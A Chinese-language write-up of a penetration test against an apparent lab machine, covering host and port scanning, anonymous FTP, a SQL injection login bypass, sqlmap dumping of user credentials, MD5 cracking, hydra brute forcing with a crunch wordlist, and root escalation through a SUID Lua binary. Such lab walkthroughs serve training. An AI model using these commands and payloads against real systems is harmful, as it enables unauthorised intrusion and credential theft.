文章描述了一次针对IP192.168.239.171的网络渗透测试过程,包括主机探测、端口扫描、匿名FTP登录、目录扫描、PHPMyAdmin的SQL注入攻击、ColdFusionCMS的漏洞利用,以及通过SUID权限和Lua脚本实现的提权至root用户的步骤。
1.信息收集
输入arp-scan 192.168.239.0/24进行主机存活探测,可以看到192.168.239.171主机存活。
对192.168.239.171主机进行端口扫描,可以看到20、21、22、82、110、443、5781、8080。
发现21端口可以匿名登录,输入:anonymous,登录成功,ls发现存在目录maintenance。
进入maintenance目录,发现存在三个文件,使用get命令下载文件。
查看三个txt文件内容,cGluZyBwb25n进行base64解密可得ping pong。没有发现可用的信息。
进行目录扫描,发现存在/website,/robots.txt,/phpmyadmin
访问http://192.168.239.171/phpmyadmin/,发现是phpmyadmin,尝试绕口令失败。
访问http://192.168.239.171/website/,查看源码发现是CMS ColdFusion。
上网查阅到 ColdFusion 发现是以 /CFIDE 目录开头的,发现有Administrator文件夹,点进去后发现空白。
使用dirb进行目录扫描,发现登录页面
尝试登录页面是否有sql注入。输入:admin’ or 1=1#\123456,登录成功
使用BP抓包,并保存到post.txt中,输入sqlmap -r post.txt --random-agent --batch --flush-session --level 2 --risk 3 --dbs,可以查看到数据库
输入sqlmap -r post.txt --random-agent --batch --flush-session --level 2 --risk 3 -D clover -T users -C "username,password" --dump,可以看到用户名和密码。(查看指定行的数据可以加入–start 1 --stop 2查看1到2行的数据)
对asta用胡的md5值进行解密,可得密码为:asta$$123。
https://md5online.it/index.lm
利用ssh进行登录,登录成功。
发现目标主机上不能使用wget、curl,使用scp上传成功。
运行linpeas.sh,发现存在/var/backups/reminder/passwd.sword,查看内容发现sword得密码,但后四位不知道,只知道是数字。
使用crunch生成密码字典,crunch 12 12 0123456789 -t P4SsW0rD@@@@ -o /tmp/passwd.txt
使用hydra进行爆破,得出密码为:P4SsW0rD4286,并登录成功。
发现存在SUID提权。
运行deamon.sh,发现是Lua。
在二进制提权网站,发现Lua提权。
输入 os.execute(‘/bin/sh’),成功提权为root用户
扫一扫
272
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
